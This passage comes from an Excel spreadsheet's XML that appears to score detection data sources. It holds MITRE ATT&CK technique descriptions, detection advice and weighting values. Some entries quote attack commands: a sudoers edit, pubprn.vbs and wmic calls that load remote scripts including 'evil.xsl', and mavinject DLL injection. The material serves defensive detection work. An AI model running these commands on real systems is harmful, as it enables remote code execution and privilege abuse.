The OSX Proton Malware has disabled &lt;code&gt;tty_tickets&lt;/code&gt; to potentially make scripting easier by issuing &lt;code&gt;echo \'Defaults !tty_tickets\' &gt;&gt; /etc/sudoers&lt;/code&gt;  (Citation: cybereason osx proton). In order for this change to be reflected, the Proton malware also must issue &lt;code&gt;killall Terminal&lt;/code&gt;. As of macOS Sierra, the sudoers file has &lt;code&gt;tty_tickets&lt;/code&gt; enabled by default.</t>
  </si>
  <si>
    <t>DCShadow</t>
  </si>
  <si>
    <t>API monitoring,Authentication logs,Network protocol analysis,Packet capture</t>
  </si>
  <si>
    <t>Monitor and analyze network traffic associated with data replication (such as calls to DrsAddEntry, DrsReplicaAdd, and especially GetNCChanges) between DCs as well as to/from non DC hosts. (Citation: GitHub DCSYNCMonitor) (Citation: DCShadow Blog) (Citation: BlueHat DCShadow Jan 2018) DC replication will naturally take place every 15 minutes but can be triggered by an attacker or by legitimate urgent changes (ex: passwords). (Citation: BlueHat DCShadow Jan 2018) Also consider monitoring and alerting on the replication of AD objects (Audit Detailed Directory Service Replication Events 4928 and 4929). (Citation: DCShadow Blog)
Leverage AD directory synchronization (DirSync) to monitor changes to directory state using AD replication cookies. (Citation: Microsoft DirSync) (Citation: ADDSecurity DCShadow Feb 2018)
Baseline and periodically analyze the Configuration partition of the AD schema and alert on creation of nTDSDSA objects. (Citation: BlueHat DCShadow Jan 2018)
Investigate usage of Kerberos Service Principal Names (SPNs), especially those associated with services (beginning with “GC/”) by computers not present in the DC organizational unit (OU). The SPN associated with the Directory Replication Service (DRS) Remote Protocol interface (GUID E3514235–4B06–11D1-AB04–00C04FC2DCD2) can be set without logging. (Citation: ADDSecurity DCShadow Feb 2018) A rogue DC must authenticate as a service using these two SPNs for the replication process to successfully complete.</t>
  </si>
  <si>
    <t>DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a Domain Controller (DC). (Citation: DCShadow Blog) (Citation: BlueHat DCShadow Jan 2018)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Injection](https://attack.mitre.org/techniques/T1178) and/or manipulate AD objects (such as accounts, access control lists, schemas) to establish backdoors for Persistence. (Citation: DCShadow Blog) (Citation: BlueHat DCShadow Jan 2018)</t>
  </si>
  <si>
    <t>Kerberoasting</t>
  </si>
  <si>
    <t>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 (Citation: Microsoft Detecting Kerberoasting Feb 2018) (Citation: AdSecurity Cracking Kerberos Dec 2015)</t>
  </si>
  <si>
    <t>Service principal names (SPNs) are used to uniquely identify each instance of a Windows service. To enable authentication, Kerberos requires that SPNs be associated with at least one service logon account (an account specifically tasked with running a service (Citation: Microsoft Detecting Kerberoasting Feb 2018)). (Citation: Microsoft SPN) (Citation: Microsoft SetSPN) (Citation: SANS Attacking Kerberos Nov 2014) (Citation: Harmj0y Kerberoast Nov 2016)
Adversaries possessing a valid Kerberos ticket-granting ticket (TGT) may request one or more Kerberos ticket-granting service (TGS) service tickets for any SPN from a domain controller (DC). (Citation: Empire InvokeKerberoast Oct 2016) (Citation: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 (Citation: AdSecurity Cracking Kerberos Dec 2015) (Citation: Empire InvokeKerberoast Oct 2016) (Citation: Harmj0y Kerberoast Nov 2016)
This same attack could be executed using service tickets captured from network traffic. (Citation: AdSecurity Cracking Kerberos Dec 2015)
Cracked hashes may enable Persistence, Privilege Escalation, and  Lateral Movement via access to [Valid Accounts](https://attack.mitre.org/techniques/T1078). (Citation: SANS Attacking Kerberos Nov 2014)</t>
  </si>
  <si>
    <t>Time Providers</t>
  </si>
  <si>
    <t>API monitoring,Binary file metadata,DLL monitoring,File monitoring,Loaded DLLs,Process monitoring</t>
  </si>
  <si>
    <t>Baseline values and monitor/analyze activity related to modifying W32Time information in the Registry, including application programming interface (API) calls such as RegCreateKeyEx and RegSetValueEx as well as execution of the W32tm.exe utility. (Citation: Microsoft W32Time May 2017) There is no restriction on the number of custom time providers registrations, though each may require a DLL payload written to disk. (Citation: Github W32Time Oct 2017)
The Sysinternals Autoruns tool may also be used to analyze auto-starting locations, including DLLs listed as time providers. (Citation: TechNet Autoruns)</t>
  </si>
  <si>
    <t>The Windows Time service (W32Time) enables time synchronization across and within domains. (Citation: Microsoft W32Time Feb 2018) W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients. (Citation: Microsoft TimeProvider)
Time providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of  &lt;code&gt;HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\&lt;/code&gt;. (Citation: Microsoft TimeProvider) The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed. (Citation: Microsoft TimeProvider)
Adversaries may abuse this architecture to establish Persistence, specifically by registering and enabling a malicious DLL as a time provider. Administrator privileges are required for time provider registration, though execution will run in context of the Local Service account. (Citation: Github W32Time Oct 2017)</t>
  </si>
  <si>
    <t>Exploitation of Remote Services</t>
  </si>
  <si>
    <t>Windows Error Reporting,Process monitoring,File monitoring</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</si>
  <si>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</si>
  <si>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Scanning](https://attack.mitre.org/techniques/T1046)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 (Citation: NVD CVE-2014-7169)
Depending on the permissions level of the vulnerable remote service an adversary may achieve [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) as a result of lateral movement exploitation as well.</t>
  </si>
  <si>
    <t>Exploitation for Defense Evasion</t>
  </si>
  <si>
    <t>Exploitation for defense evasion may happen shortly after the system has been compromised to prevent detection during later actions for for additional tools that may be brought in and used. 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This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution or evidence of Discovery.</t>
  </si>
  <si>
    <t>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Discovery](https://attack.mitre.org/techniques/T1063). The security software will likely be targeted directly for exploitation. There are examples of antivirus software being targeted by persistent threat groups to avoid detection.</t>
  </si>
  <si>
    <t>Exploitation for Credential Access</t>
  </si>
  <si>
    <t>Authentication logs,Windows Error Reporting,Process monitoring</t>
  </si>
  <si>
    <t>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Credential resources obtained through exploitation may be detectable in use if they are not normally used or seen.</t>
  </si>
  <si>
    <t>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 (Citation: Technet MS14-068) (Citation: ADSecurity Detecting Forged Tickets) Exploitation for credential access may also result in Privilege Escalation depending on the process targeted or credentials obtained.</t>
  </si>
  <si>
    <t>Data from Information Repositories</t>
  </si>
  <si>
    <t>Application logs,Authentication logs,Data loss prevention,Third-party application logs</t>
  </si>
  <si>
    <t>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The user access logging within Microsoft's SharePoint can be configured to report access to certain pages and documents. (Citation: Microsoft SharePoint Logging) The user user access logging within Atlassian's Confluence can also be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.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</si>
  <si>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Specific common information repositories include:
### Microsoft SharePoint
Found in many enterprise networks and often used to store and share significant amounts of documentation.
### Atlassian Confluence
Often found in development environments alongside Atlassian JIRA, Confluence is generally used to store development-related documentation.</t>
  </si>
  <si>
    <t>Credentials in Registry</t>
  </si>
  <si>
    <t>Windows Registry,Process command-line parameters,Process monitoring</t>
  </si>
  <si>
    <t>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</si>
  <si>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</si>
  <si>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Kernel Modules and Extensions</t>
  </si>
  <si>
    <t>System calls,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>LKMs are typically loaded into &lt;code&gt;/lib/modules&lt;/code&gt; and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. 
These are typically obtained through the operating systems package manager and installed like a normal package.
Adversaries will likely run these commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview)
On Ubuntu and Debian based systems this can be accomplished by running: &lt;code&gt;apt-get install linux-headers-$(uname -r)&lt;/code&gt;
On RHEL and CentOS based systems this can be accomplished by running: &lt;code&gt;yum install kernel-devel-$(uname -r)&lt;/code&gt;
Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands:&lt;code&gt;modprobe insmod lsmod rmmod modinfo&lt;/code&gt; (Citation: Linux Loadable Kernel Module Insert and Remove LKMs)
For macOS, monitor for execution of &lt;code&gt;kextload&lt;/code&gt; commands and correlate with other unknown or suspicious activity.</t>
  </si>
  <si>
    <t>Loadable Kernel Modules (or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 (Citation: Linux Kernel Programming) When used maliciously, Loadable Kernel Modules (LKMs) can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0). (Citation: Linux Kernel Module Programming Guide) Adversaries can use loadable kernel modules to covertly persist on a system and evade defenses. Examples have been found in the wild and there are some open source projects. (Citation: Volatility Phalanx2) (Citation: CrowdStrike Linux Rootkit) (Citation: GitHub Reptile) (Citation: GitHub Diamorphine)
Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors and enabling root access to non-privileged users. (Citation: iDefense Rootkit Overview)
Kernel extensions, also called kext, are used for macOS to load functionality onto a system similar to LKMs for Linux. They are loaded and unloaded through &lt;code&gt;kextload&lt;/code&gt; and &lt;code&gt;kextunload&lt;/code&gt; commands. Several examples have been found where this can be used. (Citation: RSAC 2015 San Francisco Patrick Wardle) (Citation: Synack Secure Kernel Extension Broken) Examples have been found in the wild. (Citation: Securelist Ventir)</t>
  </si>
  <si>
    <t>Signed Script Proxy Execution</t>
  </si>
  <si>
    <t>Monitor script processes, such as cscript, and command-line parameters for scripts like PubPrn.vbs that may be used to proxy execution of malicious files.</t>
  </si>
  <si>
    <t>Scripts signed with trusted certificates can be used to proxy execution of malicious files. This behavior may bypass signature validation restrictions and application whitelisting solutions that do not account for use of these scripts.
PubPrn.vbs is signed by Microsoft and can be used to proxy execution from a remote site. (Citation: Enigma0x3 PubPrn Bypass) Example command: &lt;code&gt;cscript C[:]\Windows\System32\Printing_Admin_Scripts\en-US\pubprn[.]vbs 127.0.0.1 script:http[:]//192.168.1.100/hi.png&lt;/code&gt;
There are several other signed scripts that may be used in a similar manner. (Citation: GitHub Ultimate AppLocker Bypass List)</t>
  </si>
  <si>
    <t>Browser Bookmark Discovery</t>
  </si>
  <si>
    <t>API monitoring,File monitoring,Process command-line parameters,Process monitoring</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for actions that could be taken to gather browser bookmark information. Remote access tools with built-in features may interact directly using APIs to gather information. Information may also be acquired through system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1086).
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</si>
  <si>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
Browser bookmarks may also highlight additional targets after an adversary has access to valid credentials, especially [Credentials in Files](https://attack.mitre.org/techniques/T1081) associated with logins cached by a browser.
Specific storage locations vary based on platform and/or application, but browser bookmarks are typically stored in local files/databases.</t>
  </si>
  <si>
    <t>Signed Binary Proxy Execution</t>
  </si>
  <si>
    <t>Monitor processes and command-line parameters for signed binaries that may be used to proxy execution of malicious files. Correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.</t>
  </si>
  <si>
    <t>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
### Mavinject.exe
Mavinject.exe is a Windows utility that allows for code execution. Mavinject can be used to input a DLL into a running process. (Citation: Twitter gN3mes1s Status Update MavInject32)
&lt;code&gt;"C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe" &lt;PID&gt; /INJECTRUNNING &lt;PATH DLL&gt;&lt;/code&gt;
&lt;code&gt;C:\Windows\system32\mavinject.exe &lt;PID&gt; /INJECTRUNNING &lt;PATH DLL&gt;&lt;/code&gt;
### SyncAppvPublishingServer.exe
SyncAppvPublishingServer.exe can be used to run powershell scripts without executing powershell.exe. (Citation: Twitter monoxgas Status Update SyncAppvPublishingServer)
Several others binaries exist that may be used to perform similar behavior. (Citation: GitHub Ultimate AppLocker Bypass List)</t>
  </si>
  <si>
    <t>Remote Access Tools</t>
  </si>
  <si>
    <t>Network intrusion detection system,Network protocol analysis,Process use of network,Process monitoring</t>
  </si>
  <si>
    <t>Monitor for applications and processes related to remote admin tools. Correlate activity with other suspicious behavior that may reduce false positives if these tools are used by legitimate users and administrators.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[Domain Fronting](https://attack.mitre.org/techniques/T1172) may be used in conjunction to avoid defenses. Adversaries will likely need to deploy and/or install these remote tools to compromised systems. It may be possible to detect or prevent the installation of these tools with host-based solutions.</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</si>
  <si>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whitelisted within a target environment. Remote access tools like VNC, Ammy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
Remote access tools may be established and used post-compromise as alternate communications channel for [Redundant Access](https://attack.mitre.org/techniques/T1108) or as a way to establish an interactive remote desktop session with the target system. They may also be used as a component of malware to establish a reverse connection or back-connect to a service or adversary controlled system.
Admin tools such as TeamViewer have been used by several groups targeting institutions in countries of interest to the Russian state and criminal campaigns. (Citation: CrowdStrike 2015 Global Threat Report) (Citation: CrySyS Blog TeamSpy)</t>
  </si>
  <si>
    <t>XSL Script Processing</t>
  </si>
  <si>
    <t>Process monitoring,Process command-line parameters,Process use of network,DLL monitoring</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of msxsl.exe and wmic.exe. Compare recent invocations of these utilities with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity (ex: URL command line arguments, creation of external network connections, loading of DLLs associated with scripting). (Citation: subTee WMIC XSL APR 2018) (Citation: Twitter SquiblyTwo Detection APR 2018) Command arguments used before and after the script invocation may also be useful in determining the origin and purpose of the payload being loaded.
The presence of msxsl.exe or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.</t>
  </si>
  <si>
    <t>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whitelisting defenses. Similar to [Trusted Developer Utilities](https://attack.mitre.org/techniques/T1127),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Command-line example: (Citation: Penetration Testing Lab MSXSL July 2017)
* &lt;code&gt;msxsl.exe customers[.]xml script[.]xsl&lt;/code&gt;
Another variation of this technique, dubbed “Squiblytwo”, involves using [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) to invoke JScript or VBScript within an XSL file. (Citation: subTee WMIC XSL APR 2018) This technique can also execute local/remote scripts and, similar to its [Regsvr32](https://attack.mitre.org/techniques/T1117)/ "Squiblydoo" counterpart, leverages a trusted, built-in Windows tool.
Command-line examples: (Citation: subTee WMIC XSL APR 2018)
* Local File: &lt;code&gt;wmic process list /FORMAT:evil[.]xsl&lt;/code&gt;
* Remote File: &lt;code&gt;wmic os get /FORMAT:”https[:]//example[.]com/evil[.]xsl”&lt;/code&gt;</t>
  </si>
  <si>
    <t>Template Injection</t>
  </si>
  <si>
    <t>Anti-virus,Email gateway,Network intrusion detection system,Web logs</t>
  </si>
  <si>
    <t>Analyze process behavior to determine if an Office application is performing actions, such as opening network connections, reading files, spawning abnormal child processes (ex: [PowerShell](https://attack.mitre.org/techniques/T1086)), or other suspicious actions that could relate to post-compromise behavior.</t>
  </si>
  <si>
    <t>Microsoft’s Open Office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 (Citation: Microsoft Open XML July 2017)
Properties within parts may reference shared public resources accessed via online URLs. For example, template properties reference a file, serving as a pre-formatted document blueprint, that is fetched when the document is loaded.
Adversaries may abuse this technology to initially conceal malicious code to be executed via documents (i.e. [Scripting](https://attack.mitre.org/techniques/T1064)). Template references injected into a document may enable malicious payloads to be fetched and executed when the document is loaded. These documents can be delivered via other techniques such as [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) and/or [Taint Shared Content](https://attack.mitre.org/techniques/T1080) and may evade static detections since no typical indicators (VBA macro, script, etc.) are present until after the malicious payload is fetched. (Citation: Redxorblue Remote Template Injection) Examples have been seen in the wild where template injection was used to load malicious code containing an exploit. (Citation: MalwareBytes Template Injection OCT 2017)
This technique may also enable [Forced Authentication](https://attack.mitre.org/techniques/T1187) by injecting a SMB/HTTPS (or other credential prompting) URL and triggering an authentication attempt. (Citation: Anomali Template Injection MAR 2018) (Citation: Talos Template Injection July 2017) (Citation: ryhanson phishery SEPT 2016)</t>
  </si>
  <si>
    <t>File Permissions Modification</t>
  </si>
  <si>
    <t>Monitor and investigate attempts to modify DACLs and file ownership, such as use of icacls (Citation: Microsoft icacls OCT 2017), takeown (Citation: Microsoft takeown OCT 2017), attrib (Citation: Microsoft attrib OCT 2017), and [PowerShell](https://attack.mitre.org/techniques/T1086) Set-Acl (Citation: Microsoft SetAcl) in Windows and chmod (Citation: Linux chmod)/chown (Citation: Linux chown) in macOS/Linux. Many of these are built-in system utilities and may generate high false positive alerts, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.
Consider enabling file permission change auditing on folders containing key binary/configuration files. Windows Security Log events (Event ID 4670) are used when DACLs are modified. (Citation: EventTracker File Permissions Feb 2014)</t>
  </si>
  <si>
    <t>File permissions are commonly managed by discretionary access control lists (DACLs) specified by the file owner. File DACL implementation may vary by platform, but generally explicitly designate which users/groups can perform which actions (ex: read, write, execute, etc.). (Citation: Microsoft DACL May 2018) (Citation: Microsoft File Rights May 2018) (Citation: Unix File Permissions)
Adversaries may modify file permissions/attributes to evade intended DACLs. (Citation: Hybrid Analysis Icacls1 June 2018) (Citation: Hybrid Analysis Icacls2 May 2018) Modifications may include changing specific access rights, which may require taking ownership of a file and/or elevated permissions such as Administrator/root depending on the file's existing permissions to enable malicious activity such as modifying, replacing, or deleting specific files. Specific file modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1015), [Logon Scripts](https://attack.mitre.org/techniques/T1037), or tainting/hijacking other instrumental binary/configuration files.</t>
  </si>
  <si>
    <t>Compiled HTML File</t>
  </si>
  <si>
    <t>Monitor and analyze the execution and arguments of hh.exe. (Citation: MsitPros CHM Aug 2017) Compare recent invocations of hh.exe with prior history of known good arguments to determine anomalous and potentially adversarial activity (ex: obfuscated and/or malicious commands). Non-standard process execution trees may also indicate suspicious or malicious behavior, such as if hh.exe is the parent process for suspicious processes and activity relating to other adversarial techniques.
Monitor presence and use of CHM files, especially if they are not typically used within an environment.</t>
  </si>
  <si>
    <t>Compiled HTML files (.chm)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Adversaries may abuse this technology to conceal malicious code. A custom CHM file containing embedded payloads could be delivered to a victim then triggered by [User Execution](https://attack.mitre.org/techniques/T1204). CHM execution may also bypass application whitelisting on older and/or unpatched systems that do not account for execution of binaries through hh.exe. (Citation: MsitPros CHM Aug 2017) (Citation: Microsoft CVE-2017-8625 Aug 2017)</t>
  </si>
  <si>
    <t>Process Monitoring</t>
  </si>
  <si>
    <t>25;25;25;25</t>
  </si>
  <si>
    <t>20;20;30;30</t>
  </si>
  <si>
    <t>50;20;30</t>
  </si>
  <si>
    <t>35;30;35</t>
  </si>
  <si>
    <t>40;60</t>
  </si>
  <si>
    <t>15;23;22;15;25</t>
  </si>
  <si>
    <t>33;34;33</t>
  </si>
  <si>
    <t>35;25;40</t>
  </si>
  <si>
    <t>30;20;50</t>
  </si>
  <si>
    <t>20;20;20;20;20</t>
  </si>
  <si>
    <t>20;40;40</t>
  </si>
  <si>
    <t>40;30;30</t>
  </si>
  <si>
    <t>35;35;30</t>
  </si>
  <si>
    <t>30;20;25;25</t>
  </si>
  <si>
    <t>33;33;34</t>
  </si>
  <si>
    <t>8;8;8;8;8;9;10;8;9;8;8;8</t>
  </si>
  <si>
    <t>15;20;20;20;25</t>
  </si>
  <si>
    <t>30;30;20;20</t>
  </si>
  <si>
    <t>30;20;20;30</t>
  </si>
  <si>
    <t>20;15;15;15;15;20</t>
  </si>
  <si>
    <t>25;25;50</t>
  </si>
  <si>
    <t>45;55</t>
  </si>
  <si>
    <t>40;20;40</t>
  </si>
  <si>
    <t>30;30;15;25</t>
  </si>
  <si>
    <t>30;70</t>
  </si>
  <si>
    <t>30;30;30;10</t>
  </si>
  <si>
    <t>10;15;20;15;20;20</t>
  </si>
  <si>
    <t>35;65</t>
  </si>
  <si>
    <t>60;40</t>
  </si>
  <si>
    <t>10;20;35;35</t>
  </si>
  <si>
    <t>40;35;25</t>
  </si>
  <si>
    <t>16;16;16;17;18;17</t>
  </si>
  <si>
    <t>20;30;30;20</t>
  </si>
  <si>
    <t>30;30;40</t>
  </si>
  <si>
    <t>70;30</t>
  </si>
  <si>
    <t>25;35;40</t>
  </si>
  <si>
    <t>33;30;37</t>
  </si>
  <si>
    <t>45;35;20</t>
  </si>
  <si>
    <t>30;40;30</t>
  </si>
  <si>
    <t>15;30;25;15;15</t>
  </si>
  <si>
    <t>10;15;20;20;15;10</t>
  </si>
  <si>
    <t>25;35;15;25</t>
  </si>
  <si>
    <t>65;35</t>
  </si>
  <si>
    <t>35;35;15;15</t>
  </si>
  <si>
    <t>15;25;40;20</t>
  </si>
  <si>
    <t>20;15;30;35</t>
  </si>
  <si>
    <t>25;20;35;20</t>
  </si>
  <si>
    <t>20;10;20;15;20;15</t>
  </si>
  <si>
    <t>30;20;30;20</t>
  </si>
  <si>
    <t>15;20;20;10;10;15;10</t>
  </si>
  <si>
    <t>15;20;20;15;10;20</t>
  </si>
  <si>
    <t>30;10;30;30</t>
  </si>
  <si>
    <t>40;25;35</t>
  </si>
  <si>
    <t>10;25;20;20;25</t>
  </si>
  <si>
    <t>25;15;20;15;25</t>
  </si>
  <si>
    <t>20;10;20;20;15;15</t>
  </si>
  <si>
    <t>40;40;20</t>
  </si>
  <si>
    <t>10;20;10;10;20;20;10</t>
  </si>
  <si>
    <t>10;30;30;30</t>
  </si>
  <si>
    <t>30;15;15;30;30</t>
  </si>
  <si>
    <t>45;30;25</t>
  </si>
  <si>
    <t>35;25;15;25</t>
  </si>
  <si>
    <t>30;35;35</t>
  </si>
  <si>
    <t>25;35;20;30</t>
  </si>
  <si>
    <t>25;30;20;25</t>
  </si>
  <si>
    <t>15;25;30;30</t>
  </si>
  <si>
    <t>20;30;50</t>
  </si>
  <si>
    <t>50;50</t>
  </si>
  <si>
    <t>15;10;20;5;20;15;15</t>
  </si>
  <si>
    <t>10;10;20;20;10;30</t>
  </si>
  <si>
    <t>20;20;10;20;15;15</t>
  </si>
  <si>
    <t>15;10;20;20;20;15</t>
  </si>
  <si>
    <t>30;15;30;25</t>
  </si>
  <si>
    <t>20;25;20;35</t>
  </si>
  <si>
    <t>15;15;15;20;20;15</t>
  </si>
  <si>
    <t>20;30;25;25</t>
  </si>
  <si>
    <t>10;20;20;10;10;15;15</t>
  </si>
  <si>
    <t>10;10;20;20;20;20</t>
  </si>
  <si>
    <t>15;10;15;15;15;15;15</t>
  </si>
  <si>
    <t>25;35;20;20</t>
  </si>
  <si>
    <t>20;10;20;10;20;20</t>
  </si>
  <si>
    <t>40;15;25;20</t>
  </si>
  <si>
    <t>The amount of systems that have this event type available out of the total amount of systems that could be able to have it</t>
  </si>
  <si>
    <t>Not available = 0, Locally available = 2, Centrally available = 5</t>
  </si>
  <si>
    <t>Hours = 1, under 30 minutes = 3, under 5 minutes to real-time = 5</t>
  </si>
  <si>
    <t>Rating Legend</t>
  </si>
  <si>
    <t>0 - 100</t>
  </si>
  <si>
    <t>Per event</t>
  </si>
  <si>
    <t>Per datasource</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">It should add up to 100 per </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>DataSource</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>, separated by a ;</t>
    </r>
  </si>
  <si>
    <t>The total amount of DataSources per technique needs to be equal to the amount of weights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</si>
</sst>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C1B33"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="10"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="10"/>
      <color theme="1"/>
      <name val="Consolas"/>
      <family val="3"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color theme="0"/>
      <name val="Consolas"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FF0C1B33"/>
      <name val="Consolas"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FF333333"/>
      <name val="Consolas"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Consolas"/>
      <family val="3"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Consolas"/>
      <family val="3"/>
    </font>
  </fonts>
  <fills count="5">
    <fill>
      <patternFill patternType="none"/>
    </fill>
    <fill>
      <patternFill patternType="gray125"/>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="0"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF0C1B33"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="8" tint="0.39994506668294322"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
  </fills>
  <borders count="3">
    <border>
      <left/>
      <right/>
      <top/>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="medium">
        <color rgb="FFA3A3A3"/>
      </left>
      <right style="medium">
        <color rgb="FFA3A3A3"/>
      </right>
      <top style="medium">
        <color rgb="FFA3A3A3"/>
      </top>
      <bottom style="medium">
        <color rgb="FFA3A3A3"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color theme="4"/>
      </left>
      <right/>
      <top style="thin">
        <color theme="4"/>
      </top>
      <bottom/>
      <diagonal/>
    </border>
  </borders>
  <cellStyleXfs count="2">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="1" fillId="4" borderId="0"/>
  </cellStyleXfs>
  <cellXfs count="26">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="1" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="2" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="1" fillId="4" borderId="0" xfId="1"/>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="1" fontId="3" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="1" fontId="4" fillId="3" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="3" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="3" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="4" borderId="0" xfId="1" applyFont="1"/>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="3" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="3" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="3" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="top"/>
